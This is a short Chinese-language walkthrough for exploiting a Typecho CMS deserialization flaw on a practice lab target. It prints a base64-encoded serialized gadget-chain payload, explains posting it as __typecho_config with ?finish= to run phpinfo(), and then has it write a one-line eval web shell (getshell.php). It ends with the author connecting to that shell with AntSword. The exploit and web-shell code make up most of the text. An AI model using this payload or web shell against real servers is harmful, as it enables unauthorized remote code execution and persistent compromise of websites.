创建并安装Typcho靶场,安装过程中需要连接数据库新建一个数据库。(这里就不细说了)
执行 phpinfo
新建php文件
并将其新建到靶场中,运行得到下列源码
YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
然后打开hackbar,将上面这段复制到postdota当中,然后再将 __typecho_config= 插入到编码之前。
再在url当中添加?finish=
执行 getshell
这个就更简单了,直接将复制到poc.php当中的代码phpinfo处修改为一句话代码,然后再像上面那样执行poc.php.接着得到代码,再将这段代码,向上面那样处理,就会得到一个getsheel文件。
'file_put_contents("getshell.php","<?php @eval(\$_REQUEST[8888]);?>")';
然后web文件夹下面会产生一个getsheel.php文件
尝试使用蚁剑连接,测试成功。
成功获得sheel
直接拿捏小笨蛋